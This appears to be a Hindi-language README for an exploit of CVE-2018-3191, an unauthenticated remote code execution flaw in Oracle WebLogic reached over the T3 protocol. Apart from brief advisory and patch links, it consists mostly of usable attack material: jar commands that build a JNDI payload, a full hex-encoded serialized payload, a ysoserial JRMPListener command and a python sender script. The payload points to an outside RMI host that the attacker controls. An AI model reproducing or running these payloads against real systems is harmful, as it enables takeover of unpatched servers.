
CVE-2018-3191 के लिए एक्सप्लॉइट जो Oracle WebLogic Server को T3 प्रोटोकॉल के माध्यम से लक्षित करता है, जो JNDI पेलोड जनरेशन और शेल एक्सेस के लिए RMI लिसनर के साथ अप्रमाणित रिमोट कोड निष्पादन को सक्षम करता है।

बीजिंग समय 17 अक्टूबर को, Oracle द्वारा आधिकारिक रूप से जारी अक्टूबर के महत्वपूर्ण पैच अपडेट CPU (Critical Patch Update) में एक उच्च-जोखिम वाले WebLogic दूरस्थ कोड निष्पादन भेद्यता (CVE-2018-3191) को ठीक किया गया।
यह भेद्यता एक अप्रमाणित हमलावर को T3 प्रोटोकॉल के माध्यम से नेटवर्क एक्सेस करके कमजोर WebLogic Server को भ्रष्ट करने की अनुमति देती है, और सफल शोषण से हमलावर WebLogic Server पर नियंत्रण प्राप्त कर सकता है, जिससे दूरस्थ कोड निष्पादन हो सकता है।
Oracle का आधिकारिक CPU लिंक:
https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
आधिकारिक सुधार योजना:
Oracle ने पहले ही अक्टूबर के महत्वपूर्ण पैच अपडेट CPU (Critical Patch Update) में इस भेद्यता को ठीक कर दिया है, और प्रभावित उपयोगकर्ताओं को सुरक्षा के लिए जल्द से जल्द अपग्रेड और अपडेट करने की दृढ़ता से सलाह दी जाती है।
https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixFMW

`
java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://www.canyouseeme.cc:6668/Jas502n >jas502n.txt
java -jar weblogic-spring-jndi.jar <jndi_address>
उदाहरण:
java -jar weblogic-spring-jndi.jar rmi://192.168.1.1:1099/Exp
weblogic-spring-jndi-12.2.1.3.jar weblogic के लिए:
12.2.1.3
weblogic-spring-jndi-10.3.6.0.jar weblogic के लिए:
10.3.6.0 12.2.1.0 12.1.3.0 12.2.1.1
`

payload(hex):
aced00057372004d636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e6a74612e4a74615472616e73616374696f6e4d616e616765724ef3ecfbb628982f0200085a001a616c6c6f77437573746f6d49736f6c6174696f6e4c6576656c735a001c6175746f6465746563745472616e73616374696f6e4d616e616765725a00196175746f646574656374557365725472616e73616374696f6e5a00146361636865557365725472616e73616374696f6e5a001f757365725472616e73616374696f6e4f627461696e656446726f6d4a6e64694c00167472616e73616374696f6e4d616e616765724e616d657400124c6a6176612f6c616e672f537472696e673b4c00267472616e73616374696f6e53796e6368726f6e697a6174696f6e52656769737472794e616d6571007e00014c0013757365725472616e73616374696f6e4e616d6571007e00017872005e636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e737570706f72742e4162737472616374506c6174666f726d5472616e73616374696f6e4d616e6167657235f8d3063abc94c402000749000e64656661756c7454696d656f75745a001d6661696c4561726c794f6e476c6f62616c526f6c6c6261636b4f6e6c795a0024676c6f62616c526f6c6c6261636b4f6e50617274696369706174696f6e4661696c7572655a00186e65737465645472616e73616374696f6e416c6c6f7765645a0017726f6c6c6261636b4f6e436f6d6d69744661696c75726549001a7472616e73616374696f6e53796e6368726f6e697a6174696f6e5a001b76616c69646174654578697374696e675472616e73616374696f6e7870ffffffff00010100000000000000010101007070740025726d693a2f2f7777772e63616e796f757365656d652e63633a363636382f4a61733530326e
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 6668 CommonsCollections1 "command"
root@374bb3d9a2d8:/tools# ./rmi.sh
* Opening JRMP listener on 6668

python weblogic.py www.canyouseeme.cc 7001 jas502n.txt


